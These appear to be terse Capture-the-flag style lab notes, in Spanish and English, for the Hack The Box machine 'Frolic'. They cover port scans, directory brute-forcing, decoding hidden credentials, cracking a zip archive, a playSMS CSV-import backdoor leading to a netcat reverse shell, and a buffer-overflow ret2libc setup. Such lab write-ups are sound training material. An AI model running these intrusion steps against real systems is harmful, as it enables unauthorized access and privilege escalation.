echo "10.129.1.92 frolic.htb" | sudo tee -a /etc/hosts
nmap -A -p- -oA output 10.129.1.92 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA blocky 10.129.1.92
nmap -sU -O -p- -oA blocky-udp 10.129.1.92
nikto -h 10.129.1.92:80
curl 10.129.1.92:9999/dev/backup/ /playsms
http://10.129.1.92:1880
http://10.129.1.92:9999
gobuster dir -k -u http://10.129.1.92:9999 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
http://10.129.1.92:9999/admin
Vemos en javascript la credencial: superduperlooperpassword_lol
http://10.129.1.92:9999/admin/success.html
Esto en verdad es un tipo de lenguajes esotericos: Ook!
Podemos usar la siguiente pagina para decodificar dcode.fr to find the plaintext. https://github.com/umbrant/pooky
Nothing here check /asdiSIAJJ0QWE9JAS
El sitio contiene un tipo de codigo en texto
curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd
curl 10.10.10.111:9999/backup/password.txt
curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip
file index.php.zip mv index.php.zip out.zip fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt out.zip
cat index.php | xxd -r -p
Use xxd
to read that back to bytes, which happens to be not only ASCII, but base64 characters:
cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d
https://copy.sh/brainfuck/
admin idkwhatispass
https://www.exploit-db.com/exploits/42044/
Creamos un archivo backdoor.csv
Importamos el backdoor.csv
Cambiamos el user agent a
Hacemos un reverse shell a nuestra maquina
nc -lvnp 443
python3 http.server 8080
wget http://frolic.htb:8080/rop
chmod +x rop
gdb rop
gef r $(python -c 'print "A"*500')
Vemos el resultado en gef
pattern create 100
patter offset $eip
uname -a
cat /proc/sys/kernel/randomize_va_space
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E " sytem@@| exit@@"
Creamos el siguiente script en python
./exploit.py